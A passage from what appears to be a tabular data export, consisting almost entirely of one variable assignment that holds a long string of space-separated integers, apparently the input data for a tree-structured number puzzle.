] | null | null | null | numbers = "8 11 6 2 4 3 3 6 1 5 0 7 1 8 5 2 4 1 1 1 1 3 2 1 1 9 0 7 6 6 1 4 1 2 2 1 1 3 3 2 2 1 1 1 1 6 0 10 4 7 5 5 3 3 8 4 4 1 1 3 1 2 1 1 4 5 3 2 3 5 3 4 1 9 0 9 8 7 1 2 3 1 9 1 3 1 3 1 2 3 2 1 3 2 1 9 0 10 5 2 7 8 7 9 6 3 8 1 1 3 3 3 3 1 2 1 2 1 5 0 8 4 4 8 2 2 7 4 1 2 1 2 3 1 3 3 2 3 3 7 1 9 0 10 9 3 1 4 8 9 2 6 7 4 1 3 1 1 3 3 3 1 3 1 7 0 6 8 7 6 3 4 1 1 1 1 1 1 2 1 1 7 0 8 1 9 5 2 2 1 1 5 3 3 1 3 3 2 2 5 2 4 1 5 4 2 3 5 1 6 0 6 1 5 2 1 8 5 1 3 1 1 1 3 1 8 0 10 4 3 1 7 1 8 6 9 9 9 1 1 1 1 2 3 1 2 1 7 0 11 2 3 1 2 3 5 2 5 1 2 4 2 2 1 1 2 1 2 1 4 1 1 1 4 2 1 4 5 3 5 1 8 0 6 3 6 6 8 1 9 1 1 2 1 3 1 2 3 1 8 0 6 4 9 5 1 6 1 2 2 1 2 2 3 2 2 1 5 0 10 7 5 3 1 9 8 1 5 6 4 3 1 3 1 3 3 2 3 2 1 3 5 1 8 0 9 7 6 1 3 3 1 1 8 7 1 1 1 3 2 1 3 1 1 5 0 11 4 3 1 4 1 7 7 7 9 6 6 3 1 1 1 1 1 5 0 6 1 2 3 1 4 9 3 1 2 3 2 4 4 2 4 5 3 5 1 6 0 10 1 2 5 1 8 1 1 7 6 7 1 2 2 1 1 1 1 7 0 10 8 9 7 8 1 2 1 5 3 5 1 3 1 1 1 3 1 1 6 0 7 7 8 7 1 9 7 1 3 1 3 3 3 1 4 4 4 3 2 3 4 1 5 0 6 7 7 1 6 4 2 1 1 2 1 3 1 6 0 7 4 3 4 1 2 4 6 3 2 3 1 1 3 1 8 0 6 8 8 4 1 1 1 3 1 3 3 3 3 1 1 1 5 5 3 3 6 1 2 1 5 3 3 7 1 6 0 8 3 1 2 9 1 6 8 1 1 3 2 2 3 1 1 5 0 11 1 2 3 4 1 4 9 8 4 6 9 1 3 2 2 1 1 9 0 8 1 6 6 5 4 9 1 2 1 2 1 3 1 2 1 1 3 3 3 3 1 3 1 3 3 4 1 7 0 6 9 1 1 4 1 3 1 2 1 3 3 1 1 1 7 0 10 8 5 5 1 2 3 6 9 9 1 3 1 3 2 3 2 3 1 5 0 9 9 4 1 1 8 3 8 5 3 1 1 2 1 1 1 1 2 5 3 6 1 7 0 9 8 4 1 9 1 9 2 2 1 3 2 1 2 3 3 3 1 6 0 8 9 2 8 7 9 5 1 1 1 3 2 2 1 2 1 6 0 9 5 5 9 5 6 9 3 1 7 3 1 3 1 3 3 4 1 1 1 5 3 3 7 1 6 0 7 4 6 1 1 2 2 7 1 1 3 2 3 1 1 5 0 9 6 9 2 7 3 3 1 5 7 3 1 2 1 3 1 5 0 9 5 6 5 8 6 1 8 2 8 1 1 2 3 3 2 2 4 5 5 3 4 3 5 1 8 0 10 1 3 2 3 1 1 3 8 8 4 1 1 2 2 3 3 2 2 1 5 0 8 3 6 7 8 1 4 5 3 2 1 2 1 1 1 9 0 8 3 2 3 7 9 1 1 1 2 3 2 2 2 1 3 1 3 4 2 2 3 3 2 6 4 5 4 3 5 1 5 0 11 7 9 3 1 3 8 5 9 9 2 6 2 1 3 2 3 1 9 0 9 1 4 1 1 4 8 8 1 1 2 1 2 1 3 3 1 3 3 1 5 0 10 7 8 7 5 6 3 5 2 3 1 1 1 1 3 3 5 2 4 1 5 3 7 1 7 0 9 7 7 2 6 1 5 6 6 6 3 3 1 3 2 1 3 1 9 0 11 1 5 7 4 2 8 3 2 8 9 7 1 2 3 2 2 3 3 1 2 
1 9 0 10 6 3 3 8 2 1 7 3 9 8 1 3 3 1 2 1 2 1 1 3 1 2 4 3 5 2 3 6 1 7 0 8 9 2 8 4 9 1 8 4 2 2 3 2 2 1 1 1 5 0 7 7 7 1 9 8 8 9 2 2 1 1 3 1 5 0 8 9 4 4 4 2 8 4 1 1 3 1 1 2 2 1 5 2 5 3 3 5 1 8 0 6 7 9 1 6 3 4 2 1 3 1 2 1 1 2 1 7 0 6 9 1 3 8 1 2 3 1 2 2 3 2 2 1 7 0 6 5 7 1 1 3 1 1 2 1 1 2 3 1 1 3 1 3 4 3 7 1 8 0 8 6 2 7 7 9 1 2 4 2 2 3 2 1 2 1 3 1 8 0 7 6 8 4 7 1 1 1 2 2 1 2 1 1 1 3 1 6 0 11 1 8 9 8 3 6 7 6 5 8 2 2 1 2 1 1 3 2 5 1 1 3 3 1 4 6 1 2 4 5 3 5 1 5 0 6 1 6 2 9 4 1 1 1 1 3 2 1 7 0 11 7 9 8 5 1 8 1 2 8 6 1 1 2 3 1 1 3 1 1 8 0 6 5 7 7 8 1 2 3 2 2 1 2 1 2 3 3 4 4 1 5 3 5 1 5 0 11 1 7 6 1 3 7 8 3 6 5 1 2 1 2 3 1 1 7 0 10 4 4 1 4 7 7 7 8 7 7 3 1 3 2 2 1 3 1 7 0 6 7 9 4 7 1 4 2 1 1 1 1 2 1 1 1 3 4 3 3 4 1 5 0 11 6 4 3 3 1 1 3 8 1 5 2 1 3 1 3 2 1 8 0 7 6 9 8 7 1 1 5 1 3 1 1 3 1 3 2 1 5 0 8 8 6 7 8 9 1 5 6 2 2 2 1 1 3 5 2 3 3 5 1 9 0 9 1 5 1 7 7 6 1 1 2 3 1 2 3 2 1 3 3 1 1 6 0 9 1 3 5 4 1 1 6 5 7 1 2 3 2 1 2 1 9 0 8 3 5 1 8 2 1 1 1 2 3 1 3 2 2 2 3 2 4 1 1 2 3 4 2 4 4 5 5 5 3 7 1 8 0 6 3 6 4 5 2 1 2 1 3 1 2 2 1 1 1 9 0 9 8 1 8 8 1 6 3 5 5 1 1 1 1 3 1 3 1 3 1 9 0 11 6 1 8 5 1 7 3 6 7 9 2 1 2 1 3 2 1 3 1 1 3 3 3 2 5 3 3 3 4 1 7 0 8 6 3 9 8 1 5 8 4 3 1 3 1 1 3 1 1 7 0 10 9 3 1 4 5 5 5 9 7 6 1 3 2 2 2 1 3 1 7 0 7 4 3 6 1 8 1 9 1 3 1 3 3 1 2 2 4 3 3 3 7 1 6 0 8 2 6 8 3 5 1 1 1 1 1 1 3 2 1 1 9 0 7 8 2 9 7 6 2 1 2 1 3 1 1 1 3 2 3 1 8 0 6 2 7 1 7 8 9 2 1 3 1 1 1 2 1 1 2 2 1 1 4 1 3 4 1 7 0 10 3 2 9 1 3 9 9 4 1 3 1 3 3 3 3 1 2 1 7 0 10 1 3 6 4 2 9 3 1 4 1 1 2 2 3 3 2 1 1 9 0 10 2 6 6 9 5 3 6 1 9 8 1 1 1 3 1 1 2 1 3 3 4 5 3 3 6 1 7 0 7 1 9 1 4 6 2 7 1 1 2 2 1 1 2 1 8 0 11 5 9 5 6 4 1 1 8 7 7 9 1 2 3 2 1 2 1 1 1 6 0 10 1 9 8 9 8 7 8 1 1 9 1 1 1 2 2 1 2 1 1 4 2 1 6 5 2 1 2 5 8 6 3 5 4 3 5 1 9 0 6 7 5 1 2 1 6 2 3 1 2 2 2 3 1 1 1 5 0 6 6 8 4 2 1 3 1 1 1 3 1 1 6 0 8 1 9 8 4 1 4 4 8 3 3 1 3 1 3 4 2 3 4 4 3 4 1 6 0 8 8 1 7 7 2 6 1 8 1 2 1 3 3 1 1 7 0 6 1 4 9 3 9 8 3 1 2 2 3 2 1 1 7 0 10 6 1 3 1 5 1 3 5 5 1 1 3 2 1 2 3 1 2 2 1 2 3 5 1 9 0 7 9 8 2 1 3 9 3 2 2 1 2 2 3 1 1 3 1 7 0 8 5 8 5 1 
7 6 6 6 1 2 3 1 2 1 1 1 8 0 7 5 1 6 2 7 6 7 1 1 1 2 2 3 1 3 1 2 4 1 5 3 5 1 8 0 7 8 6 3 3 4 1 8 2 3 3 1 1 1 1 3 1 8 0 6 8 1 9 9 4 1 1 3 1 3 2 1 3 3 1 9 0 6 6 6 2 1 9 3 2 3 1 2 1 1 3 1 1 3 3 1 4 4 3 4 1 6 0 8 2 7 7 8 2 8 1 1 1 1 1 1 3 2 1 9 0 6 9 9 8 1 2 6 1 3 3 3 1 1 2 3 2 1 9 0 8 1 6 9 6 8 9 4 9 3 1 1 1 3 1 1 3 1 3 3 2 2 2 6 6 3 5 3 3 4 1 9 0 11 7 9 1 6 2 1 8 9 3 2 3 1 2 2 1 1 3 1 2 2 1 8 0 7 2 6 3 2 3 1 1 3 3 1 1 1 3 2 1 1 6 0 8 3 9 5 1 2 9 4 3 2 3 1 1 2 3 4 5 4 2 3 5 1 5 0 6 5 1 3 5 1 5 3 3 2 1 1 1 5 0 9 1 1 6 2 6 3 4 1 7 2 3 3 3 1 1 6 0 11 3 7 2 1 7 6 6 1 2 5 7 1 1 3 2 1 2 1 1 2 5 1 3 5 1 6 0 11 3 9 7 1 2 1 9 7 3 4 8 1 2 2 1 1 1 1 6 0 7 4 9 9 4 2 1 2 2 2 1 3 1 3 1 7 0 10 9 9 8 8 1 6 6 6 7 3 3 3 3 2 1 1 1 4 2 4 1 3 3 6 1 9 0 8 1 3 5 5 5 6 8 7 1 1 1 2 3 3 1 3 3 1 6 0 6 1 7 8 8 9 1 2 1 1 3 1 3 1 6 0 9 1 1 1 1 2 4 5 3 4 2 1 1 1 3 1 3 4 4 2 1 3 3 6 1 7 0 7 2 6 1 7 3 1 4 3 3 3 1 1 1 1 1 5 0 9 2 4 3 1 3 8 7 7 8 1 3 1 1 2 1 6 0 8 5 9 5 9 1 3 8 8 2 1 2 2 2 3 4 1 4 2 4 5 5 3 2 5 3 3 4 1 6 0 10 5 2 1 3 1 8 6 1 3 7 3 2 1 2 2 1 1 6 0 10 1 7 4 7 6 5 1 8 8 3 3 2 1 3 1 3 1 7 0 7 1 3 5 7 4 9 5 3 3 3 1 3 3 1 2 1 3 1 3 5 1 5 0 10 8 7 1 1 1 3 4 5 6 1 1 1 1 3 1 1 9 0 11 3 7 1 9 8 3 3 1 8 3 8 1 3 1 2 3 3 2 2 3 1 8 0 7 6 2 5 2 1 7 9 1 1 1 1 1 3 3 3 3 5 5 1 1 3 5 1 8 0 6 1 6 1 1 2 4 1 3 3 3 2 1 3 3 1 5 0 10 5 1 1 9 7 9 1 1 9 5 1 2 1 2 2 1 7 0 8 6 6 1 9 4 2 1 5 2 1 2 1 3 1 2 1 1 4 5 2 3 4 1 8 0 11 9 3 7 5 6 1 2 7 9 3 5 1 2 1 1 3 1 2 1 1 7 0 6 1 6 1 6 6 2 1 1 2 3 3 1 3 1 7 0 9 1 1 9 9 4 2 7 9 3 3 3 1 3 2 1 2 3 1 3 2 3 5 1 8 0 6 2 5 1 7 5 4 1 3 1 3 1 3 1 1 1 7 0 7 1 5 4 3 3 1 1 2 1 1 3 2 3 1 1 6 0 9 4 1 9 5 7 1 3 8 4 2 1 3 3 1 1 1 1 1 4 1 3 3 5 5 3 3 4 1 6 0 9 5 8 1 7 7 7 9 1 1 2 1 1 2 2 1 1 5 0 7 3 8 3 2 1 1 8 3 2 1 3 3 1 6 0 10 6 2 2 7 6 8 1 1 6 1 2 2 2 2 3 1 3 2 4 4 3 4 1 5 0 10 8 4 9 2 1 1 2 4 8 7 3 3 1 2 1 1 5 0 9 4 5 7 1 6 7 9 3 5 1 3 1 2 3 1 9 0 10 3 2 6 9 1 7 1 9 2 2 1 1 1 3 1 1 3 3 2 3 1 1 3 3 6 1 9 0 6 1 1 5 9 1 8 1 2 2 1 1 2 1 1 2 1 5 0 9 4 1 7 9 9 3 7 4 1 3 2 1 1 3 1 6 0 10 2 
5 3 4 7 4 4 2 1 1 1 2 1 1 3 1 4 2 5 1 2 1 3 4 1 6 0 11 5 6 5 6 8 7 1 3 6 5 6 3 1 1 3 2 3 1 6 0 7 6 7 6 6 1 2 9 3 3 1 3 3 3 1 6 0 10 3 5 8 1 9 7 7 8 1 4 1 1 2 2 1 2 1 5 1 5 3 6 1 5 0 9 3 4 9 3 1 3 7 8 5 1 1 3 1 3 1 8 0 7 4 2 3 1 4 3 7 1 1 2 2 1 1 1 3 1 7 0 7 8 6 7 1 9 7 5 3 2 1 2 3 3 2 5 5 4 3 2 1 2 7 2 5 4 3 4 1 7 0 11 4 9 4 8 1 6 7 4 1 9 2 2 1 2 1 2 2 2 1 8 0 9 9 2 9 1 5 9 1 1 2 2 2 3 3 1 3 1 3 1 8 0 11 1 6 4 7 9 3 3 7 7 9 3 1 3 3 3 2 1 3 1 2 2 1 2 3 5 1 5 0 6 1 9 9 9 4 7 1 2 2 2 1 1 9 0 11 3 1 3 8 4 7 6 7 6 4 3 1 1 3 3 1 3 3 1 1 1 6 0 8 9 9 1 4 1 9 1 7 3 3 2 1 3 3 1 2 1 2 2 3 4 1 8 0 6 5 1 6 9 6 7 2 1 1 3 3 3 1 3 1 7 0 10 7 4 2 7 1 9 7 1 5 9 3 1 2 2 3 2 2 1 9 0 9 8 1 1 9 5 4 1 3 4 2 3 2 1 1 1 3 2 3 4 2 3 1 3 5 1 7 0 10 9 5 3 3 8 1 1 9 2 4 1 1 2 3 3 1 2 1 6 0 10 9 1 1 7 6 8 9 5 6 6 2 3 1 3 3 2 1 7 0 11 1 5 9 7 4 9 6 8 9 5 6 1 3 1 1 2 3 1 1 3 2 4 4 3 6 1 9 0 10 1 1 7 9 7 8 9 2 3 1 2 1 2 3 2 3 2 3 2 1 8 0 9 2 3 1 8 6 8 5 7 9 1 1 3 2 2 2 1 1 1 7 0 10 2 8 7 1 1 6 4 6 3 1 2 1 3 1 3 2 3 3 5 2 1 2 4 2 4 4 1 5 5 3 7 1 5 0 10 8 8 1 8 6 9 6 3 8 6 1 1 1 3 3 1 5 0 9 5 7 9 2 1 1 7 2 1 2 1 1 1 1 1 9 0 9 9 2 1 7 1 8 1 7 9 2 2 2 1 1 2 1 2 2 3 2 4 1 3 3 1 3 6 1 5 0 10 3 2 3 5 2 5 5 1 9 1 2 2 1 1 1 1 7 0 8 1 2 6 6 2 5 9 1 1 1 2 2 1 1 3 1 6 0 10 7 5 4 3 9 1 2 6 7 9 3 1 2 3 3 1 3 2 3 4 5 5 3 6 1 5 0 6 3 1 5 3 1 9 2 3 3 2 1 1 6 0 10 9 9 6 1 5 6 3 5 1 5 2 3 3 1 1 2 1 5 0 7 9 6 3 2 1 3 7 1 2 1 1 1 1 1 2 5 2 4 3 5 1 5 0 7 7 2 5 2 5 7 1 2 1 1 1 3 1 9 0 9 6 2 4 1 5 5 7 8 8 2 3 3 3 3 1 1 1 1 1 6 0 6 2 3 8 1 7 1 1 3 2 1 1 3 1 5 5 3 2 3 5 1 5 0 10 3 3 4 5 7 1 2 1 6 9 3 1 2 3 1 1 6 0 8 2 1 3 3 8 7 1 2 2 3 1 3 2 2 1 9 0 10 3 6 8 1 1 8 4 4 8 4 1 1 3 2 2 2 3 1 3 1 2 2 2 2 4 1 3 5 7 6 7 3 7 3 5 5 3 4 1 5 0 7 3 1 1 6 2 3 1 1 3 2 1 1 1 7 0 6 4 1 4 7 8 7 3 3 1 3 3 3 3 1 6 0 11 7 8 4 3 1 5 2 7 5 3 1 1 1 2 1 2 3 4 1 3 3 3 4 1 7 0 11 4 5 2 6 9 1 6 9 2 5 3 1 3 2 1 3 1 2 1 6 0 10 3 1 4 4 1 3 9 4 7 1 2 3 2 1 2 1 1 7 0 6 1 1 9 2 8 5 3 2 1 1 1 2 1 2 3 1 5 3 5 1 5 0 8 2 8 4 1 6 7 5 7 1 2 3 1 1 1 8 0 11 7 1 1 
7 9 8 4 7 4 1 6 3 1 1 3 3 1 1 3 1 8 0 7 3 8 5 4 6 1 4 3 2 3 2 1 2 1 3 1 3 4 3 2 3 7 1 8 0 11 1 7 1 1 2 6 5 3 3 9 4 2 2 2 1 3 3 2 2 1 5 0 10 1 8 8 5 9 2 4 5 7 8 2 2 3 1 1 1 6 0 7 5 1 7 1 4 2 8 1 2 1 2 1 2 3 5 5 3 3 5 2 3 4 1 8 0 7 5 1 5 4 5 9 1 2 3 1 1 1 3 3 2 1 9 0 9 4 9 7 9 7 1 7 4 7 1 1 1 2 3 3 3 2 1 1 8 0 9 9 5 1 1 4 7 5 7 8 2 2 1 1 2 2 1 1 3 4 5 3 5 3 2 4 3 4 5 3 6 1 9 0 10 5 4 8 1 4 1 4 3 2 2 2 2 1 1 1 2 1 2 1 1 8 0 7 5 7 8 7 1 1 4 1 1 2 2 2 1 3 2 1 9 0 7 6 9 1 9 2 7 9 2 1 3 3 2 1 2 1 1 3 4 3 5 2 5 3 6 1 7 0 7 1 8 6 7 6 3 3 1 1 3 2 1 2 3 1 6 0 7 1 1 9 4 7 1 1 1 1 1 1 1 1 1 7 0 10 9 8 6 5 1 4 1 8 2 3 1 2 1 3 2 1 2 1 2 1 3 4 3 3 4 1 7 0 7 1 9 6 5 1 6 6 1 3 1 1 3 3 2 1 9 0 10 2 4 9 4 1 1 1 5 9 8 3 1 1 2 1 3 3 1 3 1 9 0 10 1 1 6 1 5 1 1 2 1 3 1 1 1 2 1 2 1 2 3 3 5 3 3 3 7 1 9 0 6 9 7 5 5 1 1 2 1 2 1 1 2 1 3 3 1 8 0 7 3 7 8 4 6 1 8 3 1 1 3 2 3 1 3 1 9 0 9 4 1 6 6 5 2 8 9 6 3 3 1 1 1 3 3 3 1 4 1 4 4 2 1 3 3 1 1 3 6 5 4 3 7 1 8 0 7 8 1 6 9 1 1 8 1 2 2 3 1 2 1 3 1 6 0 6 1 6 1 5 1 1 1 3 3 2 2 1 1 5 0 6 6 1 8 1 6 6 1 2 2 3 2 3 1 2 3 5 3 4 3 7 1 5 0 6 8 1 6 6 5 2 2 1 2 2 1 1 7 0 11 4 5 5 9 3 1 2 4 5 8 8 2 1 1 3 2 3 1 1 5 0 7 8 4 1 4 1 4 5 3 1 2 3 1 3 5 5 3 3 2 5 3 6 1 5 0 6 2 2 5 8 1 5 1 1 1 2 3 1 7 0 6 3 4 1 4 1 9 2 1 3 3 3 3 2 1 7 0 11 2 1 3 1 6 5 4 6 2 7 5 3 1 1 3 3 3 2 1 1 4 3 2 1 3 4 1 5 0 6 1 7 1 5 6 6 1 3 2 2 2 1 8 0 6 9 3 4 6 3 1 2 1 1 3 3 3 3 1 1 9 0 10 4 7 9 4 9 6 1 4 8 5 3 1 1 2 3 1 1 3 3 1 3 1 1 3 5 1 8 0 7 1 1 7 7 2 9 8 3 1 1 3 1 2 2 3 1 7 0 8 7 5 5 1 1 3 2 3 1 2 3 1 3 3 1 1 5 0 6 1 2 9 3 6 6 3 1 1 1 3 4 4 3 5 4 4 1 2 1 5 3 3 5 1 8 0 10 6 4 4 9 6 9 6 2 1 2 2 1 1 3 1 3 2 3 1 7 0 7 9 6 1 7 2 1 3 3 2 2 3 1 1 1 1 6 0 8 7 9 1 5 5 8 3 4 2 2 1 1 3 3 4 2 5 1 3 3 7 1 5 0 8 7 4 1 7 2 7 4 9 1 1 1 3 1 1 5 0 11 6 5 3 6 9 4 6 8 1 3 8 1 1 1 3 3 1 5 0 11 3 3 3 8 1 1 8 1 1 7 7 2 1 3 1 3 4 1 3 4 2 3 1 3 5 1 9 0 9 5 5 7 1 6 1 3 4 4 1 3 2 2 2 1 3 1 3 1 9 0 7 1 3 8 1 1 1 8 3 1 3 2 3 1 1 1 1 1 9 0 8 3 9 2 1 6 9 4 3 1 1 2 2 2 2 3 1 1 2 3 1 2 4 3 4 1 6 0 10 8 9 2 1 4 5 3 1 8 7 1 1 
1 3 3 1 1 7 0 8 6 1 5 5 6 1 8 5 3 3 3 3 1 3 1 1 5 0 9 5 1 4 9 6 8 5 5 2 1 2 3 1 3 2 4 5 2 3 7 1 9 0 6 1 1 8 1 1 1 1 3 1 1 1 3 3 1 1 1 5 0 7 1 5 7 5 2 2 1 2 3 1 2 3 1 8 0 8 5 1 3 1 8 3 7 1 3 2 1 2 2 1 2 2 2 1 1 4 5 1 3 2 1 1 4 4 3 5 1 6 0 9 1 8 2 2 9 1 1 8 3 3 1 3 1 1 3 1 7 0 6 2 8 9 1 9 4 1 1 1 2 3 1 1 1 8 0 9 6 4 6 3 1 5 8 5 1 1 3 3 1 2 2 3 3 4 3 1 3 1 3 5 1 7 0 11 8 1 6 9 6 3 5 5 7 3 3 3 2 2 1 3 2 1 1 7 0 8 4 7 4 7 7 5 1 7 3 1 3 3 3 1 1 1 6 0 8 1 7 7 7 2 7 1 7 2 3 2 1 3 2 3 5 2 1 2 3 7 1 8 0 10 1 4 7 6 4 7 1 7 5 6 1 2 2 3 1 2 2 3 1 7 0 7 5 4 8 7 1 7 8 2 2 1 2 1 1 1 1 7 0 10 3 1 1 5 8 6 6 4 1 8 3 3 3 1 1 2 3 5 1 5 5 4 4 5 3 7 1 5 0 6 7 9 9 9 1 6 3 1 2 1 3 1 9 0 11 1 8 7 5 9 2 1 2 1 8 9 3 1 1 3 2 2 3 2 2 1 7 0 10 6 1 4 2 4 8 7 9 1 6 1 3 3 2 1 3 3 3 2 2 5 4 2 4 5 6 3 3 5 4 3 7 1 8 0 9 1 4 6 1 9 5 3 3 4 1 3 1 1 3 3 2 3 1 8 0 11 6 8 7 3 6 9 6 1 6 2 5 1 1 2 3 1 1 1 3 1 7 0 11 1 3 8 8 6 5 4 7 8 4 3 1 3 1 2 1 1 1 1 5 4 3 4 5 2 3 6 1 7 0 10 3 6 1 1 6 2 3 2 9 3 2 1 1 3 1 1 2 1 5 0 9 9 2 2 2 4 9 1 3 1 1 3 1 1 3 1 9 0 10 1 9 5 7 4 5 6 8 5 1 2 1 3 1 1 1 2 2 1 2 1 3 5 1 2 3 7 1 8 0 10 5 8 1 8 5 3 7 7 1 4 1 3 3 1 1 3 3 2 1 8 0 11 3 8 1 4 3 7 4 2 8 1 5 1 3 2 3 1 1 1 3 1 6 0 8 1 5 9 7 2 3 3 1 2 3 1 2 2 1 4 2 3 3 4 1 5 3 4 1 8 0 11 5 6 1 3 2 4 8 1 4 8 8 2 1 3 3 1 1 2 2 1 7 0 6 3 2 5 1 3 2 2 1 2 1 1 1 3 1 6 0 8 3 7 1 6 6 7 2 5 1 2 1 1 1 3 1 4 1 4 3 4 1 6 0 11 1 1 1 3 6 5 3 1 9 9 5 3 3 1 3 2 2 1 9 0 6 1 3 8 5 3 6 2 1 1 2 1 3 2 3 1 1 8 0 11 8 3 2 1 3 5 4 8 1 8 8 2 1 1 1 3 3 1 1 4 3 1 2 5 2 2 3 4 3 3 4 1 7 0 9 3 4 9 9 1 8 3 7 1 2 1 3 3 1 1 2 1 7 0 9 1 9 1 7 8 5 2 9 7 1 2 1 2 2 3 1 1 7 0 11 3 1 1 2 4 7 8 1 2 1 6 1 2 3 3 3 1 1 4 2 3 3 3 5 1 9 0 7 4 4 4 1 6 7 7 2 2 1 1 1 3 1 1 3 1 8 0 8 1 1 2 8 3 2 1 8 1 2 1 1 1 1 3 1 1 9 0 8 3 7 8 7 2 4 1 7 2 1 2 1 3 2 1 2 1 1 5 1 3 3 3 6 1 6 0 7 1 6 1 7 4 2 2 1 1 1 1 3 2 1 9 0 8 5 9 7 1 4 7 2 3 3 3 1 3 3 1 2 3 2 1 6 0 6 2 1 9 4 2 4 1 3 2 2 2 1 3 3 3 3 1 3 3 4 1 5 0 10 3 6 3 1 2 1 9 5 9 2 1 3 1 1 1 1 5 0 10 6 7 2 2 9 5 4 1 1 2 1 1 1 1 1 1 9 0 6 8 1 7 2 
7 1 1 1 1 1 3 2 2 2 1 1 3 3 1 4 1 2 3 4 3 7 2 4 3 3 4 1 5 0 7 9 7 8 7 1 1 6 1 1 2 1 2 1 9 0 8 1 9 5 4 9 5 6 6 1 1 2 2 2 3 3 1 3 1 9 0 11 1 1 7 8 8 7 7 4 1 4 5 1 3 3 3 1 3 1 1 3 2 2 5 2 3 4 1 8 0 8 6 4 2 1 3 4 7 4 1 3 3 1 2 2 1 3 1 9 0 8 2 5 9 1 2 6 4 5 1 2 3 3 2 3 2 1 2 1 7 0 7 5 7 4 8 7 1 9 3 2 2 1 3 2 1 3 2 2 1 3 5 1 8 0 11 9 7 1 6 9 3 9 7 9 2 3 1 2 2 1 1 2 3 2 1 5 0 6 6 1 9 9 4 1 1 3 1 1 2 1 9 0 8 1 1 2 9 9 1 1 8 2 3 3 1 1 3 2 2 1 4 1 2 2 2 3 6 1 9 0 6 7 3 1 9 8 3 2 2 1 2 3 3 2 3 3 1 9 0 9 7 5 3 3 8 4 1 5 1 1 2 1 1 1 3 1 1 1 1 5 0 11 2 1 9 1 6 3 1 1 1 2 3 1 3 3 3 3 3 1 2 2 4 3 4 2 6 4 3 3 7 1 6 0 8 1 9 3 1 6 6 1 8 3 3 3 1 1 1 1 6 0 9 1 8 1 4 3 1 9 8 5 3 3 3 1 3 2 1 6 0 9 5 6 4 3 9 7 1 8 7 3 2 3 2 1 3 2 4 2 5 2 5 3 3 4 1 6 0 8 6 2 5 7 1 5 3 5 2 1 1 3 3 3 1 6 0 6 6 8 4 1 5 4 2 3 2 1 1 2 1 9 0 7 3 3 1 1 8 2 8 3 1 1 3 2 3 1 1 3 5 1 1 3 3 6 1 6 0 7 1 6 3 6 5 6 9 1 2 3 1 3 2 1 5 0 7 5 8 6 2 6 1 8 2 2 3 1 1 1 8 0 6 1 8 6 9 2 2 2 1 3 3 2 1 1 1 4 3 2 4 1 5 3 4 1 7 0 9 5 8 6 6 1 4 1 4 2 1 2 2 2 1 1 1 1 7 0 10 5 3 5 7 7 2 7 7 6 1 1 2 1 1 3 3 1 1 5 0 6 3 3 1 8 7 1 2 2 2 1 3 4 4 3 2 4 2 1 5 3 3 5 1 5 0 10 6 3 7 1 5 1 3 1 9 5 2 1 3 3 1 1 7 0 8 2 7 5 1 6 4 7 8 1 2 3 3 2 1 2 1 6 0 6 6 7 8 6 1 2 1 2 1 3 1 3 5 3 5 1 3 3 4 1 8 0 9 9 1 6 1 4 8 6 6 7 3 1 3 3 2 1 3 1 1 9 0 6 6 4 2 1 1 1 3 3 1 1 3 3 2 1 3 1 5 0 10 3 7 5 1 4 9 7 5 8 3 3 3 3 1 3 5 1 3 4 3 7 1 8 0 9 1 8 9 9 1 9 5 5 4 1 1 2 3 3 2 2 2 1 7 0 8 4 1 8 4 6 9 8 8 1 1 1 2 3 2 3 1 8 0 10 1 3 8 7 3 8 2 9 8 3 1 3 1 2 3 3 2 1 2 1 1 4 4 4 4 3 4 1 7 0 7 5 4 1 8 1 4 3 3 1 1 1 2 3 1 1 6 0 8 2 7 1 3 6 4 8 4 1 1 1 3 3 1 1 6 0 11 1 5 3 1 7 6 7 4 5 1 9 2 1 3 3 1 3 1 2 4 3 3 4 1 9 0 10 2 1 6 7 2 1 3 7 5 3 1 1 1 3 2 3 1 3 3 1 8 0 11 8 3 1 7 4 8 4 3 1 6 1 1 1 2 2 3 1 1 1 1 6 0 10 5 4 5 1 3 2 2 1 3 7 3 1 3 3 3 1 3 5 5 2 4 6 1 4 5 3 5 1 8 0 9 2 2 1 5 1 7 9 3 7 1 2 3 1 1 3 1 3 1 8 0 11 9 7 2 3 6 6 9 1 1 1 9 3 1 2 2 1 1 1 3 1 7 0 11 7 8 4 1 4 7 7 2 3 9 2 3 1 1 2 2 2 2 4 5 3 3 1 3 4 1 9 0 9 5 3 1 8 1 5 5 4 4 1 3 2 1 3 3 3 1 1 1 5 0 7 5 1 1 6 8 7 8 
2 3 3 1 3 1 7 0 11 1 9 5 2 1 2 5 9 7 8 3 3 3 3 3 1 2 1 4 1 1 5 3 5 1 6 0 11 6 6 9 5 5 1 9 1 2 3 1 1 1 1 2 1 1 1 5 0 6 5 1 8 3 1 4 2 3 1 3 1 1 6 0 8 8 1 4 6 8 3 1 3 3 2 3 2 1 2 3 5 4 5 1 3 4 1 6 0 9 5 2 8 7 1 8 3 1 2 1 1 1 3 1 3 1 9 0 7 4 6 9 1 9 9 2 2 1 3 1 3 2 2 1 3 1 9 0 10 1 1 4 4 6 3 4 3 5 7 1 3 3 1 1 3 1 1 3 1 2 5 3 4 2 3 3 3 4 3 3 5 1 6 0 7 2 5 1 2 6 5 1 1 1 1 1 1 1 1 7 0 10 6 5 9 8 2 3 1 6 4 4 2 2 2 3 1 2 3 1 9 0 11 5 3 8 1 7 5 3 3 5 6 9 3 3 2 3 1 3 2 2 1 2 1 2 3 1 3 6 1 9 0 8 4 5 5 1 8 1 1 2 3 3 1 3 2 2 3 1 3 1 7 0 8 1 7 5 9 9 5 8 9 3 3 2 2 1 2 3 1 7 0 8 1 9 7 7 8 3 4 1 1 2 1 2 3 2 2 1 3 2 1 3 4 3 7 1 8 0 9 1 5 3 1 5 7 9 4 7 1 3 3 1 1 2 3 3 1 5 0 9 7 7 4 1 7 1 5 2 2 1 3 1 2 2 1 8 0 11 8 8 9 4 3 1 3 5 4 2 4 1 1 2 3 3 3 1 1 4 1 1 5 4 2 1 3 6 1 7 0 7 2 6 9 1 4 2 2 3 2 2 3 3 1 3 1 6 0 8 9 1 8 3 6 6 3 8 3 1 1 2 1 3 1 7 0 6 9 6 1 1 9 1 3 1 2 2 2 2 1 5 2 5 4 5 1 2 2 2 4 5 3 6 1 8 0 10 9 4 8 1 7 5 2 7 4 9 1 3 2 1 2 3 2 3 1 9 0 9 4 7 2 3 5 4 3 6 1 2 1 3 3 1 1 2 3 3 1 8 0 10 6 1 3 3 9 3 8 6 2 5 1 2 3 2 1 3 1 1 3 2 1 2 2 3 3 6 1 5 0 9 6 9 1 3 7 7 9 1 6 1 1 3 1 1 1 7 0 9 7 3 1 1 5 7 8 4 2 2 2 2 1 3 1 2 1 9 0 8 4 1 7 2 1 9 